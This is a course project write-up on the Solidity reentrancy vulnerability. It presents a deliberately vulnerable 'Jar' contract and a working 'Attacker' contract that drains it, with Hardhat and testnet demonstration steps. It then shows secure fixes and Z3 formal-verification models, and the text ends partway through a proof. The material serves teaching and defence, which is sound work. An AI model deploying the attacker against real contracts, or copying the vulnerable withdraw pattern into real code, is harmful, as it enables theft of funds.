Reentrancy vulnerability of smart contracts: formal verification for secure programming

The topic of this project is the reentrancy vulnerability of Solidity smart contracts. We create a vulnerable smart contract, demonstrate how to exploit it, and apply formal verification to detect the vulnerability. We also practice secure programming to fix the smart contract. The safety of the improved smart contract is ensured through formal verification.

The solidity compiler solc equips rich formal verification features. In order to carry it out for the reentrancy vulnerability, a programmer has to be aware of potential problems due to reentrancy and has to explicitly put assertions in a source code, that surely requires secure programming skills. For this project, we don't suppose that programmers have such skills, and we are going to offer a prototypical solution for them, so that they get a warning of a presence of potential reentrancy vulnerability in their code without any prerequisite secure programming knowledge. No warning means that there is no vulnerability and the smart contract is secure against the reentrancy vulnerability.

The rest of this document is organized as follows. We first review what the reentrancy problem is. There, we are going to see a running example of a vulnerable contract and an attacker contract, and a couple of security tips to prevent the problem. Then we apply a formal verification technique due to an SMT solver Z3 by Microsoft to find that our contract is indeed vulnerable. An automatically generated unsatisfiability proof due to Z3 contains a witness of the reentrancy vulnerability, which concretely illustrates a case of financial loss. A secure programming workaround gets rid of the security vulnerability, and the safety of the fixed smart contract is ensured by formal verification.

The source codes for this project are available on github.

This project was submitted as the final project to complete the online course "Ethereum Bootcamp" by alchemy.com.

Reentrancy attack

The reentrancy is a programming concept where a function call causes another function call to itself before the original function call ends. In the context of smart contracts, a function which allows reentrancy can be a cause of security problem. The reentrancy vulnerability of an Ethereum DAO has lead to a massive financial loss of $150M in 2016.

We take a look at a running example of a vulnerable Solidity smart contract and an attacker contract which exploits it. We go through secure programming tips to get rid of the vulnerability.

Vulnerable smart contract: Jar

The following Solidity code implements a coin jar. The expected use case is that anybody can make a deposit, and anytime in the future, the depositor can withdraw the deposited money.

// SPDX-License-Identifier: CC-BY-4.0
pragma solidity >=0.8.0 <0.9.0;

contract Jar {

    mapping(address=>uint) public balance;

    constructor() payable {}

    function deposit() external payable {
        balance[msg.sender] += msg.value;
    }

    function withdraw() external {
        require(balance[msg.sender] != 0, "zero balance");
        (bool s,) = msg.sender.call{ value: balance[msg.sender] }("");
        require(s, "In Jar.withdraw(), call() failed.");
        balance[msg.sender] = 0;
    }
}

The state variable balance is an array of unsigned integers indexed by address. It records which contract address has how much deposit. The constructor does nothing, but is payable, namely, this contract may receive money through the deployment. It has two external functions:

deposit is to deposit cryptocurrency into this jar contract.
withdraw is to withdraw one's deposit.

In deposit, the balance of the sender is increased by the amount of sent money by means of the following two objects,

msg.sender is the address who made the current function call,
msg.value is the amount of native cryptocurrency sent to the current function call.

In withdraw, the following functions are used:

require(b, s) checks the first argument b of boolean type, and if it is false, the transaction is reverted with an error where the second argument s of string is enclosed.
a.call{ value: v}(m) issues a call message m to the address a sending cryptocurrency which amounts to v.

It first checks that the balance is non-zero, then sends the deposit to msg.sender, the depositor. Here, the return value of call is unpacked and only the first element, a boolean value indicating whether the call was successful, is taken. If the transfer is successful the balance is reset to zero. If the balance is zero at the beginning or the transfer has failed, the transaction is reverted.

The call function is commonly used to simply transfer cryptocurrency. For this purpose, the empty call message, i.e. the nullstring (""), is specified. In order to make a particular function call on the other hand, a call message in the abi format should be given instead of the nullstring (cf. https://solidity-by-example.org/call/).

A security problem may arise if msg.sender is a smart contract rather than an EOA (externally owned account). Even if the call message is the null string, this invokes a payable function of the smart contract msg.sender. The content of the payable function is in general unknown of course, and hence we have to assume an arbitrary smart contract code is executed.

We are going to see that we can create a malicious contract which can steal money from the Jar contract by repeatedly calling the withdraw function of the Jar contract.

Attacking the vulnerable contract

The following smart contract is a successful attacker.

// SPDX-License-Identifier: CC-BY-4.0
pragma solidity >=0.8.0 <0.9.0;

interface IJar {
    function deposit() external payable;
    function withdraw() external;
}

contract Attacker {

    IJar public jar;
    address public owner;

    constructor(address _jar) payable {
        jar = IJar(_jar);
        owner = msg.sender;
    }

    function prepare() public {
        jar.deposit{ value: 1 ether }();
    }

    function attack() public {
        jar.withdraw();
    }

    receive() external payable {
        if (address(jar).balance >= 1 ether) {
            jar.withdraw();
        }
    }

    function get() public {
        require (msg.sender == owner);
        (bool s, ) = owner.call{ value: address(this).balance}("");
        require (s);
    }
}

The interface IJar declares the functions defined in Jar and used to describe the contract Attacker. The constructor of Attacker is payable and has one argument for the address; the address of the target Jar contract should be provided at the time of deployment. The function prepare is to make a 1 ETH deposit of Attacker into Jar. The function attack is to attack the target Jar contract. The function receive is a special function. It is the default receive function which is executed when somebody sent money to Attacker without specifying a function to invoke. The function get is to send all the asset of Attacker to its deployer.

The usage of the Attacker contract is as follows. An attacker deploys Attacker, providing the address of the target Jar and putting at least 1 ETH. The attacker calls the function prepare; Attacker calls deposit of Jar sending 1 ETH, and hence Attacker has a deposit of 1 ETH in Jar. Next, the attacker calls attack. The execution goes to withdraw of Jar, and as the amount of Attacker's deposit is 1 ETH, Jar proceeds to making a pay-out to Attacker by means of call. In the course of Attacker's receiving money, its receive function is executed. It checks that the asset of Jar amounts to at least 1 ETH, and if so, it tries to further withdraw 1 ETH by calling withdraw of Jar, which causes the so-called reentrancy. In withdraw of Jar the condition balance[msg.sender] != 0 is still satisfied, and therefore Jar again sends 1 ETH to Attacker. Attacker stops calling withdraw when the amount of the asset of Jar subceeds 1 ETH, and the whole transaction is successfully over without a revert.

Secure programming to prevent reentrancy

We discuss a couple of workarounds to prevent the above mentioned problem. A commonly suggested cure for the vulnerability is to make use of a lock to prohibit the reentrancy. Changing the balance before invoking call is also a solution.

Lock

A lock object creates a critical region in the source code to prevent an unexpected reentrancy. A lock object is implemented via a boolean. Before entering a critical region, it checks the lock. If the lock is false, it indicates that the critical region is not locked, and one may enter the region, switching the lock to true. After getting out of the region, the lock is reset to false. As long as the lock is true, it is not allowed to newly enter the critical region. In the Jar contract, the line of msg.sender.call should be a crucial part of the critical region. An easy way of implementing it is to use ReentranceGuard of openzeppelin (https://github.com/binodnp/openzeppelin-solidity/blob/master/docs/ReentrancyGuard.md). They provide a modifier nonReentrant which should be applied to a function. In our example, withdraw should get this modifier, so that the whole content, surely including the above mentioned critical line, is under the control of the lock object. Attacker fails to steal money, because in the first reentrancy (i.e. the second time call of withdraw), the reentrancy is detected and the whole transaction is reverted.

The fixed Jar contract looks as follows.

// SPDX-License-Identifier: CC-BY-4.0
pragma solidity >=0.8.0 <0.9.0;

contract Jar {
    mapping(address=>uint) public balance;
    bool locked;
    constructor() payable {}

    function deposit() public payable {
        balance[msg.sender] += msg.value;
    }

    function withdraw() public {
        require(!locked, "withdraw(): reentrancy not allowed");
        locked = true;
        require(balance[msg.sender] != 0, "zero balance");
        (bool s,) = msg.sender.call{ value: balance[msg.sender] }("");
        require(s, "In Jar.withdraw(), call() failed.");
        balance[msg.sender] = 0;
	    locked = false;
    }
}

Updating the critical value before transfer

Another solution particularly applicable to our case is to set zero for balance[msg.sender] immediately after checking the non-zero and before the transfer. By this change, the deposit of the attacker is already zero in the reentrancy call, and hence the whole transaction is reverted.

Underflow

In Solidity version 0.8 and above, arithmetic operations revert on underflow. Consider the following version of withdraw.

function withdraw() public {
    uint amount = balance[msg.sender];
    require(amount != 0, "zero balance");
    (bool s,) = msg.sender.call{ value: amount }("");
    require(s, "In Jar.withdraw(), call() failed.");
    balance[msg.sender] -= amount;
}

Instead of putting zero for the balance, it subtracts the amount of transfer, where amount is defined at the very beginning. After Attacker stopped withdrawal, the repeated subtraction causes an arithmetical underflow, because balance[msg.sender] is of type unsigned integer. In case of reentrancy, the whole transaction is reverted, and the contract is secure against Attacker.

Demonstration

We demonstrate the reentrancy vulnerability and also secure programming within the Hardhat environment, on an actual blockchain, and on the Remix IDE.

Hardhat

Hardhat offers a local environment for smart contract development, where one can compile, deploy, and test smart contracts.

We assume npm is available. You move to your project's directory, then the following commands install and set up Hardhat and other packages such as ethers.js@v6.

% npm install --save-dev --legacy-peer-deps hardhat
% npm install --legacy-peer-deps @nomiclabs/hardhat-waffle ethereum-waffle chai @nomiclabs/hardhat-ethers ethers dotenv
% npm init -y
% npx hardhat

The last command starts an interactive set up program, where you choose the javascript project and say yes to everything else.

Let's see how the test script goes.

% npx hardhat test test/Attacker.js


  Reentrancy vulnerability
Jar deployed at 0x5FbDB2315678afecb367f032d93F642f64180aa3
Attacker deployed at 0x8464135c8F25Da09e49BC8782676a84730C318bC

Jar's ETH balance 10.0
Attacker's ETH balance 1.0
Attacker's ETH deposit in Jar 0.0

* Call to Attacker.prepare()
Jar's ETH balance 11.0
Attacker's ETH balance 0.0
Attacker's ETH deposit in Jar 1.0

* Call to Attacker.attack()
Jar's ETH balance 0.0
Attacker's ETH balance 11.0
Attacker's ETH deposit in Jar 0.0
    ✔ Attacker successfully attacks Jar (736ms)


  1 passing (741ms)

The first line is the npx command one has to issue. Then the test script, test/Attacker.js does the following steps

Deploys the Jar contract, sending 10 ETH to it.
Deploys the Attacker contract, supplying the Jar contract's address to the constructor and also sending 1 ETH.
It prints out the addresses of the contracts and their status.
Calls prepare() function of Attacker. It let Attacker make 1 ETH deposit into Jar.
It prints out the status.
Calls attack() function of Attacker. It makes use of the reentrancy vulnerability of Jar, and moves all the asset of Jar to Attacker.

The secured Jar contract isn't vulnerable anymore, as the following test result shows that the Attacker's attempt has been foiled.

% npx hardhat test test/Secure.js


  Reentrancy vulnerability
JarLocked deployed at 0x5FbDB2315678afecb367f032d93F642f64180aa3
Attacker deployed at 0x8464135c8F25Da09e49BC8782676a84730C318bC

JarLocked's ETH balance 10.0
Attacker's ETH balance 1.0
Attacker's ETH deposit in JarLocked 0.0

* Call to Attacker.prepare()
JarLocked's ETH balance 11.0
Attacker's ETH balance 0.0
Attacker's ETH deposit in JarLocked 1.0

* Call to Attacker.attack()
JarLocked's ETH balance 11.0
Attacker's ETH balance 0.0
Attacker's ETH deposit in JarLocked 1.0
    ✔ Attacker fails to attack JarLocked (972ms)


  1 passing (977ms)

In this test script, it expects that attack() causes a revert. It indeed happens, and the asset of Jar is secured.

On blockchain

We make use of the alchemy API for the demonstration on Sepolia test net. We assume you have done the Hardhat installation procedure written in the above subsection on Hardhat.

In the directory js, you find the following scripts:

attacker-asset-balance.js
attacker-attack.js
attacker-get.js
attacker-prepare.js
deploy-attacker.js
deploy-jar.js
jar-asset-balance.js
jar-deposit-balance.js

Those scripts are prepared to carry out the demonstration. It relies on additional information provided by the file .env at the project root containing

SEPOLIA_URL=https://eth-sepolia.g.alchemy.com/v2/XXXXXXX
PRIVATE_KEY=0xXXXXXXXX
API_KEY=XXXXXXXX
JAR_ADDRESS=
ATTACKER_ADDRESS=

where the first three should come from your alchemy API account page. The last two are vacant at the beginning, and you are going to manually fill in them through the deployment process. In the github repository, you find the file .env.dummy for the template to create .env.

Even in case you have limited amount of test ethers, you can go through the demonstration by modifying the following numbers.

In contract/Attacker.sol two occurrences of 1 ether can be smaller, eg. 0.01 ether.
In js/deploy-jar.js the definition of initialBalance can be changed, eg. 0.02 ether.
In js/deploy-attacker.js and the definition of initialBalance can be changed, eg. 0.01 ether.

At the root directory of the project, issue the following command

% npx hardhat run js/deploy-jar.js

This deploys the Jar contract, and prints a line containing the address of the deployed contract. Copy the address and fill out the corresponding entry in the .env file. Issue the following command to deploy the attacker.

% npx hardhat run js/deploy-attacker.js

It reads the address of the deployed Jar contract from .env, and supply it to the constructor of Attacker. You see the message containing the address of the deployed attacker contract. Copy the address and fill out the corresponding entry in the .env file.

The process of the deployment has been done, and we are going to see the reentrancy vulnerability by now. Issue the following command to call Attacker.prepare()

% npx hardhat run js/attacker-prepare.js

The attacker contract makes a deposit into the jar contract. You can now see how the balances are.

% npx hardhat run js/jar-asset-balance.js
Jar's ETH asset balance amounts to 0.03
% npx hardhat run js/jar-deposit-balance.js
Attacker's deposit in Jar amounts to 0.01
% npx hardhat run js/attacker-asset-balance.js
Attacker's ETH asset balance amounts to 0

Note that jar-deposit-balance.js displays the deposit balance of attaker in the jar contract.

Issue the following command to call Attacker.attack()

% npx hardhat run js/attacker-attack.js

The attacker contract attacks the jar contract and withdraw 0.03 ETH rather than its actual deposit 0.01 ETH

% npx hardhat run js/jar-asset-balance.js
Jar's ETH asset balance amounts to 0
% npx hardhat run js/jar-deposit-balance.js
Attacker's deposit in Jar amounts to 0
% npx hardhat run js/attacker-asset-balance.js
Attacker's ETH asset balance amounts to 0.03

By issueing the following command, one can move the asset of the attacker to its deployer.

% npx hardhat run js/attacker-get.js

On the other hand, a secured version of Jar is deployed by the folloing command

% npx hardhat run js/deploy-jarlocked.js

The rest of the procedure is same, using the other js codes, and one can see that the attacker's attempt is foiled.

Remix IDE

The Remix IDE is a browser based online IDE for smart contract development. Just opening https://remix.ethereum.org/ , anyone can start coding, without any preparation/installation on a local computer. You can start the demonstration for the reentrancy vulnerability by importing from github the following URLs

https://github.com/miyamok/reentrancy/blob/main/contracts/Jar.sol
https://github.com/miyamok/reentrancy/blob/main/contracts/Attacker.sol

Consult details for the Remix documentation and tutorials.

Formal verification

We apply formal verification in order to detect the reentrancy vulnerability of the vulnerable jar contract and also to ensure the safety of a secure jar contract thanks to a lock object. We manually formalized a model of the contracts, and use it to find a possible reentrancy which causes an unexpected change of persistent data, such as state variables of the contract and its asset balance of the native cryptocurrency. The safety property to check is that any change of persistent data is deterministic, namely, the execution results are independent from unknown external contracts. In case the security property is violated, we get an evidence showing how it happens.

The solc compiler has rich features for formal verifications. In order to detect a reentrancy vulnerability by means of these solc features, a programmer has to put additional assertions properly, which has to be based on security knowledges. Our case study of formal verification indeed works to the above shown vulnerable smart contract without an additional assertions. Needless to say, a programmer is not required to know about security, either. Currently (as of June 2024) solc doesn't offer a feature automatically to detect reentrancy vulnerability without explicit assertions in source code.

We practice formal verification through SMT solver Microsoft's Z3, and we use SMTLIB2 for SMT modeling. The following codes are used.

Solidity code of the vulnerable smart contract (Jar.sol)
Solidity code of the attacker smart contract (Attacker.sol)
SMTLIB2 model of the vulnerable smart contract and the security property (jar.smt)
Solidity code of the secure smart contract due to lock (Jar_locked.sol)
SMTLIB2 model of the secure smart contract and the security property (jar_locked.smt)

Formal modeling

We have given formal models of Jar.sol and Jar_locked.sol within the framework of the constrained Horn clause (CHC). CHC is employed by the official solc compiler for the built-in formal verification [1] [2]. The novelty of our work is that verification concerning the reentrancy vulnerability is carried out without additional assertions which have to be inserted into a source code by a programmer with security knowledges.

We describe how the above mentioned Jar contract is modeled in the SMTLIB2 format which SMT solvers such as Z3 accept as input. The modeling of the contract follows existing research papers [2].

Sorts

We use the following custom sorts for address, uint, and mapping(address=>uint).

(define-sort A () (_ BitVec 256)) ;address
(define-sort BUINT () (_ BitVec 256)) ; bounded 256bit unsigned integer
(define-sort M () (Array A BUINT)) ;mapping from address to Int

Bitvector is used to represent 256 bit fixed size data, which is exactly uint256 of Solidity.

Predicate declarations

We declare the following predicates, i.e. boolean valued functions, in Z3 to model the Solidity functions deposit() and withdraw(), the external behavior of Jar, and the states of Jar.

(declare-fun P_alpha (M A BUINT BUINT M A BUINT BUINT Int) Bool)
(declare-fun P_omega (M A BUINT BUINT M A BUINT BUINT Int) Bool)
(declare-fun Q_alpha (M A BUINT BUINT M A BUINT BUINT Int) Bool)
(declare-fun Q_1 (M A BUINT BUINT M A BUINT BUINT Int) Bool)
(declare-fun Q_2 (M A BUINT BUINT M A BUINT BUINT Int) Bool)
(declare-fun Q_3 (M A BUINT BUINT M A BUINT BUINT Int) Bool)
(declare-fun Q_omega (M A BUINT BUINT M A BUINT BUINT Int) Bool)
(declare-fun S (M BUINT A BUINT M BUINT Int) Bool)
(declare-fun T (M BUINT A BUINT M BUINT Int) Bool)
(declare-fun Ext (M BUINT M BUINT) Bool)
(declare-fun Jar (M BUINT) Bool)
(declare-fun Init (M BUINT) Bool)

Modeling `deposit`

deposit is modeled by P_alpha, P_omega, and S. We represent the program execution as step by step state transitions. The function body of deposit consists of one line, and it is representable as one step execution, hence it suffices to have two states to present a transition system.

    function deposit() public payable {
        balance[msg.sender] += msg.value;
    }

The two functions P_alpha and P_omega stands for the state before the line and the state after the line, respectively. On the other hand, S is to model state updates due to running throughout deposit and stands for summary. In principle, it determines whether there was a revert during the function execution, and if so, it restores the original states to cancel the transaction, and otherwise, it updates the states. Here we show the Horn clauses for P_alpha, P_omega, and S in SMTLIB2.

TODO: maybe, clarifying the distinction between constrained Horn clause and Horn clause.

(assert
 (forall ((b M) (l_b M) (s A) (l_s A) (v BUINT) (l_v BUINT) (l_r Int)
	  (tb BUINT) (l_tb BUINT))
	 (=> (and (= b l_b) (= s l_s) (= v l_v) (bvule buint0 v) (= l_r 0)
		  (= l_tb (bvadd tb l_v)) (bvule tb l_tb) (bvule l_v l_tb))
	     (P_alpha b s v tb l_b l_s l_v l_tb l_r))))

(assert
 (forall ((b M) (l_b M) (s A) (l_s A) (v BUINT) (l_v BUINT) (l_r Int)
	  (tb BUINT) (l_tb BUINT) (l_b^ M))
	 (=> (and (P_alpha b s v tb l_b l_s l_v l_tb l_r)
		  (= l_b^ (store l_b l_s (bvadd (select l_b l_s) l_v)))
		  (bvule (select l_b l_s) (select l_b^ l_s))
		  (bvule l_v (select l_b^ l_s)))
	     (P_omega b s v tb l_b^ l_s l_v l_tb l_r))))

(assert
 (forall ((b M) (l_b M) (s A) (l_s A) (v BUINT) (l_v BUINT) (l_r Int)
	  (tb BUINT) (l_tb BUINT) (b^ M) (tb^ BUINT) (r Int))
	 (=> (and (P_omega b s v tb l_b l_s l_v l_tb l_r)
		  (=> (not (= l_r 0)) (and (= b^ b) (= tb^ tb)))
		  (=> (= l_r 0) (and (= b^ l_b) (= tb^ l_tb)))
		  (= r l_r))
	     (S b tb s v b^ tb^ r))))

Let's see what the arguments of P_alpha and P_omega are. b models the Solidity state variable balance of type mapping(address=>uint), s models msg.sender, the address of the sender, v models msg.value, the amount of the native cryptocurrency sent from the sender to this contract for the call to deposit, and tb models this.balance, the balance of the native cryptocurrency this contract owns. The original values of these variables b, s, v, and tb will be updated by the summary S only if the function call is over without a revert. The variables with the prefix l_ (standing for local) are to record intermediate changes, and are used to update states if there is no revert, and are discarded in case of a revert. P_alpha is in charge of initialization. There, l_b, l_s, l_v, and l_tb are initialized by the corresponding values. Note that deposit is a payable function and the balance of this contract is increased by msg.value, that is modeled by the equational constraints on tb etc., where overflow is also handled properly. Here, bvadd is a function for addition of bitvectors, and bvule is the less than relation taking bitvectors as unsigned integers. l_r keeps the intermediate revert status, which is initialized as 0 (no error). The function body of deposit consists of just one line. An execution of this line makes a transition from P_alpha to P_omega. The equational constraint comes straightforwardly to describe the state after the execution. Here we use arithmetic for arrays, that involves operations select and store. select takes two arguments, an array and an index, and returns a value at the index. store takes three arguments, an array, an index, and a value, and returns a new array where the value at the index has been updated to be the given value. The Solidity shared variable balance is increased by the sent value from a caller. Note that overflow is handled as well. S is to check whether the function execution reached its end, P_omega, with any revert or not, and in case there is a revert, i.e. l_r is non-zero, it restores the original states to cancel the transaction, and otherwise, it updates states by l_ prefixed-variables. The arguments b^ and bt^ are in charge of the states when the execution is over.

Modeling `withdraw` and the external behavior of `Jar`

Let's move on to the model of withdraw which relies on the notion of external behavior of the contract Jar. The external behavior is the key notion to model how an unknown smart exploits the vulnerability of Jar. We model withdraw as follows.

(assert
 (forall ((b M) (l_b M) (s A) (l_s A) (v BUINT) (l_v BUINT) (l_r Int)
	  (tb BUINT) (l_tb BUINT))
	 (=> (and (= b l_b) (= s l_s) (= v l_v) (= l_r 0) (= l_tb tb))
	     (Q_alpha b s v tb l_b l_s l_v l_tb l_r))))

(assert
 (forall ((b M) (l_b M) (s A) (l_s A) (v BUINT) (l_v BUINT) (l_r Int)
	  (tb BUINT) (l_tb BUINT))
	 (=> (and (Q_alpha b s v tb l_b l_s l_v l_tb l_r)
		  (not (= (select l_b l_s) buint0)))
	     (Q_1 b s v tb l_b l_s l_v l_tb l_r))))

(assert
 (forall ((b M) (l_b M) (s A) (l_s A) (v BUINT) (l_v BUINT) (l_r Int)
	  (tb BUINT) (l_tb BUINT) (l_tb^ BUINT))
	 (=> (and (Q_1 b s v tb l_b l_s l_v l_tb l_r)
		  (= l_tb^ (bvsub l_tb (select l_b l_s)))
		  (bvule (select l_b l_s) l_tb))
	     (Q_2 b s v tb l_b l_s l_v l_tb^ l_r))))

(assert
 (forall ((b M) (l_b M) (l_b^ M) (s A) (l_s A) (v BUINT) (l_v BUINT) (l_r Int)
	  (tb BUINT) (l_tb BUINT) (l_tb^ BUINT) (b^ M) (tb^ BUINT) (b^^ M) (tb^^ BUINT))
	 (=> (and (Q_2 b s v tb l_b l_s l_v l_tb l_r)
		  (and (Ext b^ tb^ b^^ tb^^)
		       (= b^ l_b) (= b^^ l_b^)
		       (= tb^ l_tb) (= tb^^ l_tb^)))
	     (Q_3 b s v tb l_b^ l_s l_v l_tb^ l_r))))

(assert
 (forall ((b M) (l_b M) (s A) (l_s A) (v BUINT) (l_v BUINT) (l_r Int)
	  (tb BUINT) (l_tb BUINT) (l_b^ M))
	 (=> (and (Q_3 b s v tb l_b l_s l_v l_tb l_r)
		  (= l_b^ (store l_b l_s buint0)))
	     (Q_omega b s v tb l_b^ l_s l_v l_tb l_r))))


(assert
 (forall ((b M) (l_b M) (s A) (l_s A) (v BUINT) (l_v BUINT) (l_r Int)
	  (tb BUINT) (l_tb BUINT) (b^ M) (tb^ BUINT) (r Int))
	 (=> (and (Q_omega b s v tb l_b l_s l_v l_tb l_r)
		  (=> (not (= l_r 0)) (and (= b^ b) (= tb^ tb)))
		  (=> (= l_r 0) (and (= b^ l_b) (= tb^ l_tb)))
		  (= r l_r))
	     (T b tb s v b^ tb^ r))))

Q_alpha is for the initial step. Q_1 is derived if the condition balance[msg.sender] != 0 holds. We model the next line of call, splitting it into two steps, where the first step Q_2 is to send the native currency to msg.sender and the second one Q_3 is to process the call message. For simplicity we consider only the case that call is always successful. This simplification is harmless because in case call is not successful, it is reverted by require, and it doesn't affect the safety property. Note that we should explicitly handle a revert if assert was used here instead of require in the Solidity code. Q_omega comes after the last line to set zero for balance[msg.sender]. T is a summary predicate for withdraw.

There are two new elements, one is a new function bvsub for the subtraction in bitvectors. The other is a predicate Ext which models an external behavior of Jar.

(assert (forall ((b M) (tb BUINT)) (Ext b tb b tb)))

(assert (forall ((b M) (s A) (v BUINT) (r Int)
		 (tb BUINT) (b^ M) (tb^ BUINT) (b^^ M) (tb^^ BUINT))
		(=> (and (Ext b tb b^ tb^)
			 (S b^ tb^ s v b^^ tb^^ r)
			 (= r 0))
		    (Ext b tb b^^ tb^^))))

(assert (forall ((b M) (s A) (v BUINT) (r Int)
		 (tb BUINT) (b^ M) (tb^ BUINT) (b^^ M) (tb^^ BUINT))
		(=> (and (Ext b tb b^ tb^)
			 (T b^ tb^ s v b^^ tb^^ r)
			 (= r 0))
		    (Ext b tb b^^ tb^^))))

An unknown external function is arbitrary in general, and it can involve calls to the public or external functions of any other contracts including Jar. The idea is to abstractly model how such an unknown function affects Jar. Ext is defined as a boolean valued function which takes four arguments. The first two represents a state which consists of b and tb, i.e. the state variable balance and the amount of the native asset, this.balance, of Jar. In principle, here we should list all publicly available data of the contract relevant to the formal analysis. The other two arguments represent a possible future state of Jar as a result of executing an unknown function, which may involve function calls to deposit and withdraw. The above three Horn clauses represent the case where no external behavior changing the states and the cases where deposit and withdraw caused external behaviors, respectively.

Now we are able to discuss the Horn clause of Q_3 (same as above)

(assert
 (forall ((b M) (l_b M) (l_b^ M) (s A) (l_s A) (v BUINT) (l_v BUINT) (l_r Int)
	  (tb BUINT) (l_tb BUINT) (l_tb^ BUINT) (b^ M) (tb^ BUINT) (b^^ M) (tb^^ BUINT))
	 (=> (and (Q_2 b s v tb l_b l_s l_v l_tb l_r)
		  (and (Ext b^ tb^ b^^ tb^^)
		       (= b^ l_b)
		       (= b^^ l_b^)
		       (= tb^ l_tb)
		       (= tb^^ l_tb^)))
	     (Q_3 b s v tb l_b^ l_s l_v l_tb^ l_r))))

This models that l_b and l_tb came from Q_2 goes to any l_b^ and l_tb^ satisfying Ext l_b l_tb l_b^ l_tb^, that means the state of l_b and l_tb goes to another state of l_b^ and l_tb^ due to a transition due to an external behavior.

Modeling the smart contract `Jar`

Considering the lifetime of smart contracts, it has the initial state and states reachable from the initial one through transactions. This is modeled by Init and Jar as follows, assuming zeros is an empty mapping (all values are zero). tb is arbitrary and represents that it may receive any amount of native asset through the deployment, as the constructor of Jar is payable. Jar represents the contract's state, which is understood as a tree whose root is of the initial state, and branches are formed due to one step transition without a revert.

(assert (forall ((tb BUINT)) (Init zeros tb)))

;; Jar
(assert (forall ((b M) (tb BUINT)) (=> (Init b tb) (Jar b tb))))

(assert
 (forall ((b M) (s A) (v BUINT) (tb BUINT) (b^ M) (tb^ BUINT) (r Int))
	 (=> (and (Jar b tb)
		  (T b tb s v b^ tb^ r)
		  (= r 0))
	     (Jar b^ tb^))))

(assert
 (forall ((b M) (s A) (v BUINT) (tb BUINT) (b^ M) (tb^ BUINT) (r Int))
	 (=> (and (Jar b tb)
		  (S b tb s v b^ tb^ r)
		  (= r 0))
	     (Jar b^ tb^))))

Modeling the security property

The smart contract Jar has been formally modeled. We are at the last step to model the security property as follows.

(assert
 (forall ((b M) (tb BUINT) (s A) (v BUINT)
          (b^ M) (tb^ BUINT) (r^ Int)
          (r_^ Int) (b_^ M) (tb_^ BUINT))
         (not (and (Jar b tb)
                   (T b tb s v b^ tb^ r^)
                   (T b tb s v b_^ tb_^ r_^)
                   (= r^ 0)
                   (= r_^ 0)
                   (not (and (= b^ b_^)
                             (= tb^ tb_^)))))))

This Horn clause represents the property that result of a call to withdraw is deterministic. In case this property is violated, a call to withdraw yields different results depending on an unknown external contracts. The SMT solver answers unsat and gives a proof log which witnesses two distinct results which can be yielded by a function call.

Our security property is not very optimal in the sense that it causes false positive in the detection of the reentrancy vulnerability, as one call to deposit on one hand and nothing to call on the other hand can violate the property. It is better to make use of an invariance concerning the balances, and specify for example that the difference between the total amount of deposits and the amount of native asset of the contract is constant. However, for the moment, we employ the above mentioned assertion due to the following reasons, and consider some variations of the model, such as only withdraw is allowed for an external call from an unknown contract, in order to find a vulnerability result.

Automatic generation of an invariance is not straightforward in a general case.
We have faced a limit of computational power of the machine in case the above mentioned use of the invariance was employed (still non-terminating in half a day of Z3 execution). We prefer to keep the problem manageable in seconds, and we need an optimization to overcome this issue.

We leave them for future work.

Experiment

We are going to see how to practice formal verification by means of the SMT solver Z3. Z3 is particularly advantageous for our verification work thanks to its integration with another software Spacer which is specialized for Horn clause solving. If the model in conjunction with the security property is satisfiable, the contract is secure. If it is unsatisfiable, Z3/Spacer provides a proof which witnesses the violation of the security property. At the end, we read off an evidence showing that our jar contract causes a financial loss due to the reentrancy vulnerability as follows:

Assume the contract has the state ([1], 3), where the singleton array [1] means that the account of index 0 has its deposit which amounts to 1 and 3 means that the jar contract's asset amounts to 3.
Distinct transactions may happen when the account of the index 0 calls withdraw:
- the state of the contract ends up with ([0], 1)
- the state of the contract ends up with ([0], 2)
Although withdraw is supposed to pay back to the caller the exact amount of the deposit, that is 1, the contract may pay back 2.
This divergence comes through a call to msg.sender.call in withdraw.

It required some modification of the model, in order to get the above vulnerability scenario, for instance, deactivating a Horn clause describing the external behavior of Jar due to the deposit function which is indeed innocent. Executing Z3 for the model and the security property mentioned in the previous sections without a modification, we didn't get an answer from Z3 in a reasonable time consumption (after half a day, we gave up). The following version of the definition of Init enabled me to get an answer in a few seconds.

(assert (forall ((b M) (tb BUINT)) (=> (Init b tb) (Jar b tb))))

Contrary to the source code, this new model allows any balance at the deployment. Although the balance should be all zero at the moment of deployment, and updates of the balance should be done by the functions deposit and withdraw, Z3/Spacer could not manage the task to figure out a suitable state of the contract and transitions to it.

Another modification was limiting the size of the array, balance, and the maximal number for the uint to small numbers. This means that for the proof search we assume the number of users is small and also assume our system allows only small numbers for representing the amount of asset. In order to let the size of the balance array small, we give a custom definition for A, the data sort for the accounts. For example, the following unit sort, namely, a singleton sort,

(declare-datatypes () ((Unit unit)))
(define-sort A () Unit)

is used to represent the case there is only one account holder in our system. For the asset, we used the bitvector of length 2 representing numbers {0, 1, 2, 3}.

Unsatisfiability proof

Z3 provides the following proof of unsatisfiability in seconds. We are going to read off that it demonstrates the above mentioned divergent behaviors.

((set-logic HORN)
(declare-fun query!0 ((Array Unit (_ BitVec 2)) (_ BitVec 2) Unit (_ BitVec 2) (Array Unit (_ BitVec 2)) (_ BitVec 2) Int Int (Array Unit (_ BitVec 2)) (_ BitVec 2)) Bool)
(proof
(let ((?x2247 ((as const (Array Unit (_ BitVec 2))) (_ bv0 2))))
(let ((?x2347 (store ?x2247 unit (_ bv1 2))))
(let (($x2931 (query!0 ?x2347 (_ bv3 2) unit (_ bv0 2) ?x2247 (_ bv1 2) 0 0 ?x2247 (_ bv2 2))))
(let (($x534 (forall ((A (Array Unit (_ BitVec 2))) (B (_ BitVec 2)) )(Ext A B A B))))
(let ((@x3083 (asserted $x534)))
(let ((@x3082 ((_ hyper-res 0 0) @x3083 (Ext ?x2347 (_ bv2 2) ?x2347 (_ bv2 2)))))
(let (($x953 (forall ((A (Array Unit (_ BitVec 2))) (B Unit) (C (_ BitVec 2)) (D (_ BitVec 2)) (E (Array Unit (_ BitVec 2)))
                       (F (_ BitVec 2)) (G (Array Unit (_ BitVec 2))) (H (Array Unit (_ BitVec 2))) (I (_ BitVec 2)) )
                     (let (($x951 (and (Ext H I A C) (Ext A D E F) (not (= (select A B) (_ bv0 2))) (= D (bvadd C (bvmul (_ bv3 2) (select A B))))
                        (= G (store E B (_ bv0 2))) (bvule (select A B) C))))
           (=> $x951 (Ext H I G F))))
 ))
